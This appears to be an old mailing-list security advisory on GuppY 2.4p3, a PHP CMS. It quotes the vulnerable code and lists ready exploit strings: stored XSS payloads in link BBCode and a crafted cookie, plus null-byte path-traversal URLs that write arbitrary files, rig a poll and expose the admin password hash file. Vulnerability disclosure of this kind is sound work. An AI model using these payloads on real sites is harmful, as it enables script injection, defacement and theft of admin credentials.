<<< Date Index >>>     <<< Thread Index >>>

GuppY : XSS, Files Reading/Writing



Informations :
°°°°°°°°°°°°°
Language : PHP
Bugged Version : 2.4p3 (and less ?)
Patched version : 2.4p4
Website : http://www.freeguppy.org
Problems :
- Permanent XSS
- Files Reading
- Files Writing

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

postguest.php :

--------------------------------------------------------------------------------------------------------------------
[...]
$ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/l\\]", "<a href=\"http://www.\\1\"; target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/L\\]", "<a href=\"http://www.\\1\"; target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/l\\]", "<a href=\"http://www.\\1\"; target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/L\\]", "<a href=\"http://www.\\1\"; target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt); $ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt); $ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt); $ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt);
[...]
--------------------------------------------------------------------------------------------------------------------


inc/includes.inc, inc/includes_IIS.inc :

-------------------------------------------------------------------------------
[...]
$usercookie = "GuppYUser";
$userprefs = array();
if (!empty($HTTP_COOKIE_VARS[$usercookie])) {
 $userprefs = explode("||",$HTTP_COOKIE_VARS[$usercookie]);
 $userprefs[0] = strip_tags($userprefs[0]);
 $userprefs[1] = strip_tags($userprefs[1]);
 $userprefs[2] = strip_tags($userprefs[2]);
 $userprefs[3] = strip_tags($userprefs[3]);
 $userprefs[4] = strip_tags($userprefs[4]);
 $userprefs[5] = strip_tags($userprefs[5]);
 $userprefs[6] = strip_tags($userprefs[6],"<br>");
if (($userprefs[0] == $lang[0] || $userprefs[0] == $lang[1]) & empty($lng)) {
   $lng = $userprefs[0];
 }
}
[...]
-------------------------------------------------------------------------------


inc/functions.php :

--------------------------------------------------------------
[...]
function ReadDBFields($fic) {
 global $connector;
 $DataDB = Array();
 if (FileDBExist($fic)) {
   $DataDB = file($fic);
   for ($i = 0; $i < count($DataDB); $i++) {
     $Fields[$i] = explode($connector,trim($DataDB[$i]));
   }
 }
 return $Fields;
}

function WriteDBFields($fic,$Fields) {
 global $connector;
 $fhandle = fopen($fic, "w");
 $DataDB = "";
 for ($i = 0; $i < count($Fields); $i++) {
   for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) {
     $DataDB .= trim($Fields[$i][$j]).$connector;
   }
   $DataDB .= trim($Fields[$i][count($Fields[$i])-1])."\n";
 }
 fputs($fhandle, $DataDB);
 fclose($fhandle);
}
[...]
--------------------------------------------------------------


tinymsg.php :

-----------------------------------------------------------------------------------------------------------------------------
[...]
elseif ($action == 2) {
[...]
   $dbmsg[0][0] = 0;
   $dbmsg[1][0] = $from;
   $dbmsg[1][1] = GetCurrentDateTime();
   $dbmsg[1][2] = PutBR(RemoveConnector(stripslashes($msg)));
   WriteDBFields($userep.$to.$dbext,$dbmsg);
 }
[...]
elseif ($action == 3) {
?>
[...]
 $dbmsg = Array();
 if (FileDBExist($userep.$userprefs[1].$dbext)) {
   $dbmsg = ReadDBFields($userep.$userprefs[1].$dbext);
   for ($i = 1; $i < count($dbmsg); $i++) {

?>
<p><? echo $web6; ?> <b><? echo $dbmsg[$i][0]; ?></b> <? echo $web7." ".FormatDate($dbmsg[$i][1]); ?></p>
<p><? echo $dbmsg[$i][2]; ?></p>
<?
     if ($dbmsg[$i][0] != $web214) {
?>
<p align="center">[ <A href ="javascript:PopupWindow('tinymsg.php?lng=<? echo $lng; ?>&action=1&to=<? echo $dbmsg[$i][0]; ?>&from=<? echo $userprefs[1]; ?>','tinywrite',330,245,'no','no')"><? echo $web140; ?></A> ]</p>
<?
     }
?>
<hr>
[...]
-----------------------------------------------------------------------------------------------------------------------------


Exploits :
°°°°°°°°

- [l]" style="background:url('javascript:[SCRIPT]');visibility:hidden;[/l]

- [l][l] style=list-style:url(javascript:[SCRIPT]) truc=[/l][/l]


- With a cookie named "GuppYUser" and with the value :
fr||[NICK]||[MAIL]||LR||||on||<br style="background:url('javascript:[SCRIPT]')">, if you send a message (forum, guestbook,...) the javascript is executed.


- http://[target]/tinymsg.php?action=2&from=Youpi!||Great !||rose||10000&msg=1&to=../poll will add a possibility to the current poll : "Youpi!" with the pink color ("rose" in french) and a score of 10000.

- http://[target]//tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2 will write into http://[target]/tadaam.html the line :
0\nyoupi1||[DATE+HEURE]||youpi2

- The cookie named "GuppYUser" and with the value :
fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1
sent to the page : http://[target]/tinymsg.php?action=3 will show the source of the file http://[target]/admin/mdp.php (containing the md5-crypted admin password).



Patch/More Details :
°°°°°°°°°°°°°°°°°°
http://www.phpsecure.info




frog-m@n

_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail